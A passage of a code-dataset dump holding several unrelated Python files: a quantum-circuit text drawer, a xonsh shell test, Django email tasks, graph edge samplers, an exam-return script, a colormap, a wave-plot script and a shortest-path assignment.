使用したいqubitすべてが利用できるかチェック\n if all(self.gate_map[min_v : max_v + 1, i]):\n # 現在使うqubitの位置をFalseに変更する\n # このときTrueの場所(ゲートのかかる場所)より左側も全部Falseにする\n # そうしておかないと, 左詰めで適用する実装になっているので\n # 後から適用する1qubitゲートがその前にかかってしまったりする\n self.gate_map[min_v : max_v + 1, : i + 1] = False\n # 最終的に作成する2次元配列で考えた場合のqubitの位置・深さを計算するため\n # gate_mapの場合の計算結果を変数に保持させて終了する\n col = i\n break\n\n # 一番深いとこまで探索したのに, 描き込める場所が見つからなかったとき\n elif i + 1 == self.depth:\n # gate_mapとcircuit_pictureを拡張する\n self._expand_map_and_picture()\n # 追加した場所にゲートを割り当てていく\n self.gate_map[min_v : max_v + 1, : i + 2] = False\n col = i + 1\n\n # 仕様(2次元配列)に合わせて位置を調整\n row = min_v * 4\n col = col * 8 + 1\n\n return row, col\n\n def _expand_map_and_picture(self) -> None:\n \"\"\"回路図が重なって表示されないように深さを増やすメソッド\"\"\"\n # self.gate_mapの拡張\n additional_gate_map = np.full(self.qubit_num, True).reshape(self.qubit_num, 1)\n self.gate_map = np.concatenate([self.gate_map, additional_gate_map], axis=1)\n\n # self.circuit_pictureを拡張\n additional_circuit_pic = np.full((self.vertical_size, 8), \" \")\n self.circuit_picture = np.concatenate(\n [self.circuit_picture, additional_circuit_pic], axis=1\n )\n # 右端を\"-\"でセット\n for i in range(self.qubit_num):\n # 横向きのワイヤーがある場所は配列番号で2,6,10,14,...番目\n row = (i + 1) * 4 - 2\n self.circuit_picture[row][-1] = \"-\"\n\n # 深さを+1\n self.depth += 1\n # 深さが+1になったのでcircuit_pictureの横サイズも増やす\n self.horizontal_size += 8\n\n def _write_gate_on_picture(\n self, gate_string: List[str], ulc: Tuple[int, int]\n ) -> None:\n \"\"\"作成したゲート文字列を実際に描き込むメソッド\"\"\"\n row, col = ulc\n width = 7\n for line in gate_string:\n self.circuit_picture[row][col : col + width] = list(line)\n row += 1\n\n def _connect_wire(self) -> None:\n \"\"\"量子回路の横向きのワイヤーの接続を補うメソッド\"\"\"\n # 回路のqubit数回ループ\n for i in range(self.qubit_num):\n # 横向きのワイヤーがある場所は配列番号で2,6,10,14,...番目\n row = (i + 1) * 4 - 2\n # 先頭から1文字ずつ調査していくための変数\n p = 0\n # 各行の先頭から見ていく\n while True:\n # 先頭の文字を読む\n char_now = self.circuit_picture[row][p]\n if char_now in 
f\"{self.CON_DOT.ctrl}{self.CON_DOT.ctrlo}\":\n # 読んだのが\"・\"のときは次の文字が必ず空白になっているはずなので\"-\"に書き換える\n self.circuit_picture[row][p + 1] = \"-\"\n elif char_now == \"-\":\n # 読んだのが\"-\"のときは次の1文字を読む\n if self.circuit_picture[row][p + 1] == \" \":\n # \"-\"の次が\" \"(空白)なので\"-\"に書き換えワイヤーを繋げる\n self.circuit_picture[row][p + 1] = \"-\"\n elif self.circuit_picture[row][p + 1] == \"|\":\n # 読んだ文字が\"|\"のときはゲートの左壁にぶつかったorコントロールユニタリの制御信号(縦線)のどちらか\n # 最初に, 3文字分(通常のゲートの横幅分)を空けて次の文字を読んでみる\n # つまりp+1 + 3 + 1文字分先を読む\n if self.circuit_picture[row][p + 5] == \"|\":\n # ぶつかったのは通常のゲートの幅の左壁だったので, ゲートの右側まで抜ける\n # 現在位置pは(左壁の位置-1)で+5すれば現在地は右壁の\"|\"になる\n # そして最後のインクリメントで右壁の次にいく\n p += 5\n elif self.circuit_picture[row][p + 3] == \"|\":\n # ぶつかったのは離れたqubitにかかるゲート用の壁(幅の狭いゲート)の左壁だった\n # +3すれば現在地は右壁の\"|\"になるので, 最後のインクリメントで右壁の次にいく\n p += 3\n else:\n # 読んでみるとゲートの右の壁でない => 読んだのはコントロールユニタリの縦線だった\n # なので次の空白を\"-\"とする\n # \"|\"を\"+\"に書き換えワイヤーがクロスする表示も試したが,\n # どこが制御qubitかわかりにくかったのでやめた.\n self.circuit_picture[row][p + 2] = \"-\"\n # 次に読む文字を今変更した\"-\"にするために調整\n p += 1\n # インクリメントして次の文字の位置をセット\n p += 1\n # もしインクリメントしたときに配列のサイズを超えたら終了\n if p + 1 == self.horizontal_size:\n break\n\n\ndef draw_circuit(\n circuit: QuantumCircuit, verbose: bool = False, dot: str = \"large\"\n) -> None:\n \"\"\"\n 量子回路図をテキストで出力するための関数\n\n Parameters\n ----------\n circuit: qulacs.QuantumCircuit\n 出力したい量子回路(qulacs.QuantumCircuit)\n verbose: bool\n 詳細出力(default=False). Trueのときはgateにcircuitに追加された順番が出力される\n dot: str\n 制御qubitを表すドットのスタイル(default=\"large\")\n \"\"\"\n\n Drawer = TextCircuitDrawer(circuit, dot=dot)\n Drawer.draw(verbose=verbose)\n","repo_name":"Qulacs-Osaka/qulacs-visualizer","sub_path":"qulacsvis/visualization/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":34165,"program_lang":"python","lang":"ja","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"73041962933","text":"# -*- coding: utf-8 -*-\n\"\"\"(A down payment on) Testing for ``xonsh.base_shell.BaseShell`` and associated classes\"\"\"\nimport os\n\nfrom xonsh.environ import Env\nfrom xonsh.base_shell import BaseShell\nfrom xonsh.shell import transform_command\n\n\ndef test_pwd_tracks_cwd(xonsh_builtins, xonsh_execer, tmpdir_factory, monkeypatch ):\n asubdir = str(tmpdir_factory.mktemp(\"asubdir\"))\n cur_wd = os.getcwd()\n xonsh_builtins.__xonsh_env__ = Env(PWD=cur_wd, XONSH_CACHE_SCRIPTS=False, XONSH_CACHE_EVERYTHING=False)\n\n monkeypatch.setattr(xonsh_execer, \"cacheall\", False, raising=False)\n bc = BaseShell(xonsh_execer, None)\n\n assert os.getcwd() == cur_wd\n\n bc.default('os.chdir(r\"' + asubdir + '\")')\n\n assert os.path.abspath(os.getcwd()) == os.path.abspath(asubdir)\n assert os.path.abspath(os.getcwd()) == os.path.abspath(xonsh_builtins.__xonsh_env__['PWD'])\n assert 'OLDPWD' in xonsh_builtins.__xonsh_env__\n assert os.path.abspath(cur_wd) == os.path.abspath(xonsh_builtins.__xonsh_env__['OLDPWD'])\n\n\ndef test_transform(xonsh_builtins):\n @xonsh_builtins.events.on_transform_command\n def spam2egg(cmd, **_):\n if cmd == 'spam':\n return 'egg'\n else:\n return cmd\n\n assert transform_command('spam') == 'egg'\n assert transform_command('egg') == 'egg'\n assert transform_command('foo') == 'foo'\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/xonsh_xonsh/xonsh-master/tests/test_base_shell.py","file_name":"test_base_shell.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"4175746660","text":"from django.contrib.auth 
import get_user_model\n\nfrom config.celery import app\nfrom django.core.mail import send_mail\n\nUser = get_user_model()\n\nusers = User.objects.all()\n\n@app.task\ndef send_spam():\n send_mail(\n 'Здравствуйте, Вас приветствует courses.kg',\n 'Мы рады что вы с нами!',\n 'musabekova.amina13@gmail.com',\n [user.email for user in users]\n )\n\n@app.task\ndef send_notifications_about_new_course(course_title):\n \"\"\"Рассылка уведомлений о новых курсах для всех пользователей\"\"\"\n send_mail(\n 'Спам',\n f'Привет, опубликован новый курс! {course_title}',\n 'musabekova.amina13@gmail.com',\n [user.email for user in users]\n )\n","repo_name":"aliiavgh/courses_team_hackathon","sub_path":"config/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25910446234","text":"from graphz.dataset import GraphDataset\nfrom graphz.utils import reservoir_sampling\nimport numpy as np\nimport random\nimport warnings\n\nclass EdgeSampler:\n \n def __init__(self, graph):\n self.graph = graph\n\n def sample(self, n_samples):\n raise NotImplementedError()\n\nclass PositiveEdgeSampler(EdgeSampler):\n\n def sample(self, n_samples):\n \"\"\"\n Samples from existing edges.\n \"\"\"\n # Precheck\n if n_samples > self.graph.n_edges:\n raise ValueError('Number of positive samples cannot be greater than the total number of edges.')\n # Sample positives using reservoir sampling\n x = reservoir_sampling(self.graph.get_edge_iter(), n_samples)\n if not self.graph.directed:\n # For undirected graphs, we randoms exchanges the order of the two\n # nodes in the tuple to prevent learners from exploiting the\n # ordering infomation. We want our learners to be able to predict\n # links for both (na, nb) and (nb, na) as they represent the same\n # edge in an undirected graph\n x = [(e[1], e[0], 1) if random.random() >= 0.5 else (e[0], e[1], 1) for e in x]\n else:\n x = [(e[0], e[1], 1) for e in x]\n return x\n\nclass NegativeEdgeSampler(EdgeSampler):\n\n def sample(self, n_samples, exclusions=None):\n \"\"\"\n Samples disconnected pairs (no self loops will be included).\n \"\"\"\n # Precheck\n max_n_neg = self.graph.get_max_n_edges()\n if n_samples > max_n_neg - self.graph.n_edges:\n raise ValueError('Too many negative samples requested.')\n # Check the network sparsity level\n sparsity_level = (self.graph.n_edges + n_samples) / max_n_neg\n if sparsity_level > 0.05:\n warnings.warn('Graph is not sparse enough. 
Random sampling may be slow.')\n x = []\n # Sample negatives randomly\n if exclusions is not None and len(exclusions) > 0:\n if self.graph.directed:\n sampled_pairs = set(map(lambda e: (e[0], e[1]), exclusions))\n else:\n # For undirected graphs, (na, nb) and (nb, na) are equivalent.\n sampled_pairs = set()\n for e in exclusions:\n if e[0] < e[1]:\n sampled_pairs.add((e[0], e[1]))\n else:\n sampled_pairs.add((e[1], e[0]))\n else: \n sampled_pairs = set()\n n_nodes = self.graph.n_nodes\n if self.graph.directed:\n for i in range(n_samples):\n while True:\n na = random.randint(0, n_nodes - 1)\n nb = random.randint(0, n_nodes - 1)\n if na == nb or (nb in self.graph.adj_list[na]) or ((na, nb) in sampled_pairs):\n continue\n x.append((na, nb, 0))\n sampled_pairs.add((na, nb))\n break\n else:\n for i in range(n_samples):\n while True:\n na = random.randint(0, n_nodes - 1)\n nb = random.randint(0, n_nodes - 1)\n # For undirected graphs, (na, nb) and (nb, na) correspond\n # to the same edge when na != nb.\n if na == nb:\n # Ensure that na < nb when recording (na, nb) in sampled\n # pairs so we won't sample an edge twice.\n continue\n if na > nb:\n na, nb = nb, na\n if (nb in self.graph.adj_list[na]) or ((na, nb) in sampled_pairs):\n continue\n # We randomly exchange na and nb here to prevent learners to\n # exploit the fact that na < nb.\n if random.random() >= 0.5:\n x.append((na, nb, 0))\n else:\n x.append((nb, na, 0))\n # When recording sampled pairs, always ensure that na < nb.\n sampled_pairs.add((na, nb))\n break\n return x\n\nclass BalancedEdgeSampler(EdgeSampler):\n\n def __init__(self, graph):\n \"\"\"\n An edge sampler that samples equal number of positive and negative edges.\n \"\"\"\n super().__init__(graph)\n self._pos_sampler = PositiveEdgeSampler(self.graph)\n self._neg_sampler = NegativeEdgeSampler(self.graph)\n\n def sample(self, n_samples):\n \"\"\"\n Samples edges.\n\n :returns: List of triplets (na, nb, is_connected)\n \"\"\"\n n_pos = n_samples // 2\n n_neg = n_samples - n_pos\n # Sample\n x_pos = self._pos_sampler.sample(n_pos)\n x_neg = self._neg_sampler.sample(n_neg)\n return x_pos + x_neg\n","repo_name":"morriswmz/graphz","sub_path":"graphz/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7995411992","text":"import html\nimport os\nimport sys\nimport shutil\nfrom pathlib import Path\n\n# actually BaseMessenger would work\nfrom plom.messenger import ManagerMessenger\nfrom plom.rules import isValidStudentNumber, StudentIDLength\nfrom plom.finish import CSVFilename\nfrom .return_tools import csv_add_return_codes\n\n\ndef do_renaming(fromdir, todir, sns):\n print(\"Searching for foo_.pdf files in {0}...\".format(fromdir))\n todir = Path(todir)\n fromdir = Path(fromdir)\n numfiles = 0\n for file in os.scandir(fromdir):\n if file.name.endswith(\".pdf\"):\n oldname = file.name.partition(\".\")[0]\n sn = oldname.split(\"_\")[-1]\n assert isValidStudentNumber(sn)\n code = sns[sn]\n newname = \"{0}_{1}.pdf\".format(oldname, code)\n newname = todir / newname\n print(\n ' found SN {0}: code {1}, copying \"{2}\" to \"{3}\"'.format(\n sn, code, file.name, newname\n )\n )\n shutil.copyfile(fromdir / file.name, newname)\n numfiles += 1\n return numfiles\n\n\ndef copy_soln_files(shortname, todir, sns):\n fromdir = Path(\"solutions\")\n todir = Path(todir)\n for sid in sns:\n fname = \"{}_solutions_{}.pdf\".format(shortname, sid)\n if 
os.path.isfile(fromdir / fname):\n shutil.copyfile(fromdir / fname, todir / fname)\n else:\n print(\"No solution file for student id = {}\".format(sid))\n\n\ndef make_coded_return_webpage(use_hex, digits, salt=None, server=None, solutions=False):\n \"\"\"Make the secret codes and the return-code webpage.\n\n Args:\n use_hex (bool): use random hex digits, otherwise an integer\n without leading zeros.\n digits (int): length of secret code.\n salt (str): instead of random, hash from student ID salted\n with this string. Defaults to None, which means do not\n do this, use random secret codes.\n solutions (bool): add a solutions link to the website\n server (str/None): server to contact or None for default\n (probably localhost).\n \"\"\"\n msgr = ManagerMessenger(server)\n msgr.start()\n\n spec = msgr.get_spec()\n # Can also get spec via filesystem\n # spec = SpecVerifier.load_verified()\n shortname = spec[\"name\"]\n longname = html.escape(spec[\"longName\"])\n codedReturnDir = Path(\"codedReturn\")\n\n reassembles = [\"reassembled\", \"reassembled_ID_but_not_marked\"]\n if os.path.isdir(reassembles[0]) and os.path.isdir(reassembles[1]):\n print('You have more than one \"reassembled*\" directory:')\n print(\" decide what you trying to do and run me again.\")\n sys.exit(2)\n elif os.path.isdir(reassembles[0]):\n fromdir = reassembles[0]\n elif os.path.isdir(reassembles[1]):\n fromdir = reassembles[1]\n else:\n print(\"I cannot find any of the dirs: \" + \", \".join(reassembles))\n print(\" Have you called the `reassemble` command yet?\")\n sys.exit(3)\n print('We will take pdf files from \"{0}\".'.format(fromdir))\n\n if codedReturnDir.exists() or os.path.exists(\"return_codes.csv\"):\n print(\n 'Directory \"{}\" and/or \"return_codes.csv\" already exist:\\n'\n \" if you want to re-run this script, delete them first.\".format(\n codedReturnDir\n )\n )\n sys.exit(4)\n os.makedirs(codedReturnDir)\n\n print(\"Generating return codes spreadsheet...\")\n if salt:\n print('Salt string \"{}\" can reproduce these return codes'.format(salt))\n else:\n print(\"These return codes will be random and non-reproducible\")\n sns = csv_add_return_codes(\n CSVFilename, \"return_codes.csv\", \"StudentID\", use_hex, digits, salt\n )\n print('The return codes are in \"return_codes.csv\"')\n\n numfiles = do_renaming(fromdir, codedReturnDir, sns)\n if numfiles > 0:\n print(\"Copied (and renamed) {0} files\".format(numfiles))\n else:\n print('no pdf files in \"{0}\"? Stopping!'.format(fromdir))\n sys.exit(5)\n # if solutions then copy across the solutions files\n if solutions:\n print(\"Copying solution files into place.\")\n copy_soln_files(shortname, codedReturnDir, sns)\n\n print(\"Adding index.html file\")\n if solutions:\n from .html_view_test_template import htmlsrc_w_solutions as htmlsrc\n else:\n from .html_view_test_template import htmlsrc\n\n htmlsrc = htmlsrc.replace(\"__COURSENAME__\", longname)\n htmlsrc = htmlsrc.replace(\"__TESTNAME__\", shortname)\n htmlsrc = htmlsrc.replace(\"__CODE_LENGTH__\", str(digits))\n htmlsrc = htmlsrc.replace(\"__SID_LENGTH__\", str(StudentIDLength))\n\n with open(codedReturnDir / \"index.html\", \"w\") as htmlfile:\n htmlfile.write(htmlsrc)\n\n print(\"All done! 
Next tasks:\")\n print(' * Copy \"{}\" to your webserver'.format(codedReturnDir))\n print(' * Privately communicate info from \"return_codes.csv\"')\n print(\" - E.g., see `contrib/plom-return_codes_to_canvas_csv.py`\")\n print(\" * Read docs about the security implications of all this.\")\n","repo_name":"plomgrading/plom","sub_path":"plom/finish/coded_return.py","file_name":"coded_return.py","file_ext":"py","file_size_in_byte":5101,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"28767511376","text":"# Excetpions handling: errors detected during execution are called exceptions.\n# To handle exceptions, we use try, catch, finally and else\n\n# def divide(a, b):\n# print(a/b)\n\n# divide(2,0)\n\n# print(\"other part working\")\n# print()\n\n\"\"\" execpting the error by giving the code a tries\ntry:\n x = 3 / 2\n #print(x)\nexcept ZeroDivisionError as e:\n print(\"Division by zero! the execption was\", e)\n #handle exceptions\n # x = 0\n pass\nfinally:\n print(\"the end\")\n\n\nprint(\"other part of code\")\n\"\"\"\n# try:\n# x = 5 / 0\n# print(x)\n# except ZeroDivisionError as e:\n# print(\"I got an error\")\n# raise # this for debug, raise the exception for the debugging purpose\n# finally:\n# print(\"The End\")\n\n# print(\"code runing perfectly\")\n\ntry:\n d = {}\n a = d[1]\n b = d.jrgeugnsa\nexcept (KeyError, AttributeError) as e: # or you can use the keyword: Exception\n print(\"A keyError and attribute error exception was caught!\")\n raise","repo_name":"ramiabukhader/Python-fundamentals","sub_path":"Python_Constructors/Exceptions.py","file_name":"Exceptions.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14459928531","text":"from __future__ import division\nimport scipy.interpolate\nfrom matplotlib import cm\nimport numpy as np\n\ndef bipolar(lutsize=256, n=0.333, interp=[]):\n \"\"\"\n Bipolar hot/cold colormap, with neutral central color.\n\n This colormap is meant for visualizing diverging data; positive\n and negative deviations from a central value. It is similar to a\n blackbody colormap for positive values, but with a complementary\n \"cold\" colormap for negative values.\n\n Parameters\n ----------\n lutsize : int\n The number of elements in the colormap lookup table. (Default is 256.)\n n : float\n The gray value for the neutral middle of the colormap. (Default is\n 1/3.)\n The colormap goes from cyan-blue-neutral-red-yellow if neutral\n is < 0.5, and from blue-cyan-neutral-yellow-red if neutral > 0.5.\n For shaded 3D surfaces, an `n` near 0.5 is better, because it\n minimizes luminance changes that would otherwise obscure shading cues\n for determining 3D structure.\n For 2D heat maps, an `n` near the 0 or 1 extremes is better, for\n maximizing luminance change and showing details of the data.\n interp : str or int, optional\n Specifies the type of interpolation.\n ('linear', 'nearest', 'zero', 'slinear', 'quadratic, 'cubic')\n or as an integer specifying the order of the spline interpolator\n to use. Default is 'linear'. See `scipy.interpolate.interp1d`.\n\n Returns\n -------\n out : matplotlib.colors.LinearSegmentedColormap\n The resulting colormap object\n\n Notes\n -----\n If neutral is exactly 0.5, then a map which yields a linear increase in\n intensity when converted to grayscale is produced. 
This colormap should\n also be reasonably good\n for colorblind viewers, as it avoids green and is predominantly based on\n the purple-yellow pairing which is easily discriminated by the two common\n types of colorblindness. [2]_\n\n Examples\n --------\n >>> from mpl_toolkits.mplot3d import Axes3D\n >>> from matplotlib import cm\n >>> import matplotlib.pyplot as plt\n >>> import numpy as np\n\n >>> fig = plt.figure()\n >>> ax = fig.gca(projection='3d')\n >>> x = y = np.arange(-4, 4, 0.15)\n >>> x, y = np.meshgrid(x, y)\n >>> z = (1- x/2 + x**5 + y**3)*exp(-x**2-y**2)\n >>> surf = ax.plot_surface(x, y, z, rstride=1, cstride=1, linewidth=0.1,\n >>> vmax=abs(z).max(), vmin=-abs(z).max())\n >>> fig.colorbar(surf)\n >>> plt.show()\n >>> set_cmap(bipolar(201))\n >>> waitforbuttonpress()\n >>> set_cmap(bipolar(201, 0.1)) # dark gray as neutral\n >>> waitforbuttonpress()\n >>> set_cmap(bipolar(201, 0.9)) # light gray as neutral\n >>> waitforbuttonpress()\n >>> set_cmap(bipolar(201, 0.5)) # grayscale-friendly colormap\n\n References\n ----------\n .. [1] Lehmann Manja, Crutch SJ, Ridgway GR et al. \"Cortical thickness\n and voxel-based morphometry in posterior cortical atrophy and typical\n Alzheimer's disease\", Neurobiology of Aging, 2009,\n doi:10.1016/j.neurobiolaging.2009.08.017\n .. [2] Brewer, Cynthia A., \"Guidelines for Selecting Colors for\n Diverging Schemes on Maps\", The Cartographic Journal, Volume 33,\n Number 2, December 1996, pp. 79-86(8)\n http://www.ingentaconnect.com/content/maney/caj/1996/00000033/00000002/art00002\n\n \"\"\"\n if n < 0.5:\n if not interp:\n interp = 'linear' # seems to work well with dark neutral colors cyan-blue-dark-red-yellow\n\n _data = (\n (0, 1, 1), # cyan\n (0, 0, 1), # blue\n (n, n, n), # dark neutral\n (1, 0, 0), # red\n (1, 1, 0), # yellow\n )\n elif n >= 0.5:\n if not interp:\n interp = 'cubic' # seems to work better with bright neutral colors blue-cyan-light-yellow-red\n # produces bright yellow or cyan rings otherwise\n\n _data = (\n (0, 0, 1), # blue\n (0, 1, 1), # cyan\n (n, n, n), # light neutral\n (1, 1, 0), # yellow\n (1, 0, 0), # red\n )\n else:\n raise ValueError('n must be 0.0 < n < 1.0')\n\n xi = np.linspace(0, 1, np.size(_data, 0))\n cm_interp = scipy.interpolate.interp1d(xi, _data, axis=0, kind=interp)\n xnew = np.linspace(0, 1, lutsize)\n ynew = cm_interp(xnew)\n\n # No form of interpolation works without this, but that means the interpolations are not working right.\n ynew = np.clip(ynew, 0, 1)\n\n return cm.colors.LinearSegmentedColormap.from_list('bipolar', ynew, lutsize)\n\nif __name__ == \"__main__\":\n\n from pylab import *\n\n def func3(x,y):\n return (1- x/2 + x**5 + y**3)*exp(-x**2-y**2)\n\n # make these smaller to increase the resolution\n dx, dy = 0.05, 0.05\n\n x = arange(-3.0, 3.0001, dx)\n y = arange(-3.0, 3.0001, dy)\n X,Y = meshgrid(x, y)\n\n Z = func3(X, Y)\n pcolor(X, Y, Z, cmap=bipolar(n=1./3, interp='linear'), vmax=abs(Z).max(), vmin=-abs(Z).max())\n colorbar()\n axis([-3,3,-3,3])\n\n show()\n","repo_name":"LSSTDESC/chroma","sub_path":"chroma/bipolar.py","file_name":"bipolar.py","file_ext":"py","file_size_in_byte":5070,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"34598070153","text":"# Program to:\n# (1) make Fisher wave plots,\n# (2) calculate speed of wavefront\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n# arguments from command line\nimport sys\n# for round_sig() method\nfrom math import log10, floor\n\n\ndef round_sig(x, sig):\n ''' 
Method to round to specified sig figs '''\n return round(x, sig-int(floor(log10(x)))-1)\n\n\n\n# Arbitrary well occupancy for mid-point of wave \nn_star = 0.5\n\n# Plot Fisher wave for every \"time_gap\" number of data points\ntime_gap = 1\n\n\n\nfig = plt.figure()\ntitle = \"Fisher waves\"\nfig.suptitle(title, fontsize=32)\nplt.xlabel('Well', fontsize=26); plt.ylabel('Well population', fontsize=26)\nplt.tick_params(axis='both', which='major', labelsize=20)\nplt.ylim((0,1.2))\n\n#plt.yscale('log')\n\n\nfilename = str(sys.argv[1])\nf = open( filename, 'r' )\n\n# Store absolute time intervals between colonisation of wells\nabsolute_ints = []\n# and the absolute times\nabs_times = []\n\nwell = 1\nwave_front = 1\nline_num = 0\n\nfor line in f:\n\n # Read in line as list of floats\n columns = [ float(x) for x in line.split()]\n # Number of wells (first column=time, all rest are wells)\n nwells = len(columns)-1\n\n\n # For generating gradient plot of speed --------------------\n if (wave_front < nwells and columns[ wave_front ] > n_star ):\n abs_times.append( (wave_front, columns[0]) )\n wave_front += 1\n # ----------------------------------------------------------\n\n\n # --- For plot of Fisher waves ---------------------------------\n line_num += 1\n if (line_num % time_gap == 0 ):\n\n time = columns[0]\n columns.pop(0)\n \n w = 0\n wells = []\n populations = []\n for i in columns:\n wells.append(w)\n w += 1\n populations.append( i )\n\n lbl = str(int(time))+\" hours\"\n plt.plot( wells, populations, linewidth='4', label=lbl )\n\n #---------------------------------------------------------------\n\n\nplt.legend(bbox_to_anchor=(1.01, 1), loc=2, borderaxespad=0.)\n\n\n\n\n\n###################### PLOTTING SPEED OF WAVEFRONT ############################################\nfig2 = plt.figure()\ntitle = \"Position of wavefront vs time\"\nfig2.suptitle(title, fontsize=34)\nplt.xlabel('t( N(well) > N* ) [hours]', fontsize=26); plt.ylabel('Well', fontsize=26)\nplt.tick_params(axis='both', which='major', labelsize=20)\n\n\n# Make column scatter plot of \"well vs #PMs\" for all detectable PMs\nw=[]; t=[];\n\nabs_times.pop(0) # Ignore first 2 data points or we see dependence on initial population size\nabs_times.pop(0)\n\nfor (a,b) in abs_times:\n w.append(a); t.append(b);\n\n# Calculate slope of plot using numpy polyfit()\nslope, intercept = np.polyfit( t, w, 1 )\nspeed = round_sig( slope, 3 )\n\ntext=\"Speed = \"+str(speed)+\" wells/h\"\nplt.plot(t, w, linewidth='3')\n#plt.text(60, .025, r'$\\mu=100,\\ \\sigma=15$')\n#plt.text(int(len(abs_times)*0.2), int(len(abs_times)*0.9), text, fontsize=26)\nplt.text( (t[len(t)-1]*0.2), (w[len(w)-1]*0.9), text, fontsize=26)\n\n\nplt.show()\n################################################################################################\n\n\n\n\n\n\n\n\nexit(0)\n\n","repo_name":"Golpette/antibiotic-resistance","sub_path":"Data analysis scripts/plot_fisher_speed_DENSITY.py","file_name":"plot_fisher_speed_DENSITY.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74427916212","text":"#! /usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n'''\nAssignment 3: Reliable Communications\n\nTeam Number:\nStudent Names:\n'''\nimport unittest\nimport sys\nimport math\nimport itertools\nimport heapq\nimport networkx as nx\n\"\"\"IMPORTANT:\nWe're using networkx only to provide a reliable graph\nobject. 
Your solution may NOT rely on the networkx implementation of\nany graph algorithms. You can use the node/edge creation functions to\ncreate test data, and you can access node lists, edge lists, adjacency\nlists, etc. DO NOT turn in a solution that uses a networkx\nimplementation of a graph traversal algorithm, as doing so will result\nin a score of 0.\n\"\"\"\n\ntry:\n import matplotlib.pyplot as plt\n HAVE_PLT = True\nexcept ImportError:\n HAVE_PLT = False\n\nclass PriorityQueue:\n \"\"\"Priority Queue\n\n An efficient priority queue implementation, as described in\n the heapq library of the python manual [1].\n\n [1]: http://docs.python.org/2/library/heapq.html#priority-queue-implementation-notes\n \"\"\"\n def __init__(self):\n self.pqueue = [] # list of entries arranged in a heap\n self.entry_finder = {} # mapping of tasks to entries\n self.REMOVED = '' # placeholder for a removed task\n self.counter = itertools.count() # unique sequence count\n\n def add_task(self, task, priority=0):\n 'Add a new task or update the priority of an existing task'\n if task in self.entry_finder:\n self.remove_task(task)\n count = next(self.counter)\n entry = [priority, count, task]\n self.entry_finder[task] = entry\n heapq.heappush(self.pqueue, entry)\n\n def remove_task(self, task):\n 'Mark an existing task as REMOVED. Raise KeyError if not found.'\n entry = self.entry_finder.pop(task)\n entry[-1] = self.REMOVED\n\n def pop_task(self):\n 'Remove and return the lowest priority task. Raise KeyError if empty.'\n while self.pqueue:\n priority, count, task = heapq.heappop(self.pqueue)\n if task is not self.REMOVED:\n del self.entry_finder[task]\n return task\n\n raise KeyError('pop from an empty priority queue')\n\n \"\"\"Auxiliary Functions\"\"\"\n def get_priority(self, task):\n \"\"\"\n Sig: integer ==> integer\n Pre: task is a task that exists in entry_finder\n Post:\n Example: pq.get_priority(5)==>10\n \"\"\"\n entry = self.entry_finder[task]\n return entry[0]\n\n def length(self):\n \"\"\"\n Sig: ==> integer\n Pre:\n Post:\n Example: pq.length()==>5\n \"\"\"\n return len(self.entry_finder)\n\n\ndef reliable(G, s, t):\n \"\"\"\n Sig: graph G(V,E), vertex, vertex ==> vertex[0..k]\n Pre:\n Post:\n Example: TestCase 1\n \"\"\"\n\n tovisit = PriorityQueue()\n pred = {}\n dist = {}\n pi = {}\n path = []\n\n #Perform Dijkstra's Algorithm\n for node in G.nodes():\n # Variant: len(G.nodes())-G.nodes().index(node)\n pred[node] = None\n if node != s:\n pi[node] = 1000000\n tovisit.add_task(node, pi[node])\n\n pi[s] = 0\n tovisit.add_task(s, pi[s])\n\n while tovisit.length()!=0:\n # Variant: tovisit.length()\n node = tovisit.pop_task()\n for neighbor in G.neighbors(node):\n #Avoid log(0)\n if G[node][neighbor]['fp']<1:\n l = pi[node] - math.log(1-G[node][neighbor]['fp'])\n else:\n # fp == 1 means the edge always fails: -log(1-fp) diverges,\n # so give the edge an infinite cost rather than a free one\n l = float('inf')\n if pi[neighbor] > l:\n tovisit.add_task(neighbor, l)\n pi[neighbor] = l\n pred[neighbor]=node\n\n #Reconstruct path\n node = t\n while node!=s:\n # Variant: len(G.edges())-len(path)\n path.insert(0, node)\n node = pred[node]\n path.insert(0, node)\n\n return path\n\n\nclass ReliableCommunicationsTest(unittest.TestCase):\n \"\"\"Test suite for the reliable communications problem\n \"\"\"\n def draw_mst(self, G, path, n):\n if not HAVE_PLT:\n return\n pos = nx.spring_layout(G) # positions for all nodes\n plt.subplot(120 + n)\n plt.title('Reliability %d' % n)\n plt.axis('off')\n # nodes\n nx.draw_networkx_nodes(G, pos, node_size = 700)\n # edges\n nx.draw_networkx_edges(G, pos, width = 6, alpha = 0.5,\n 
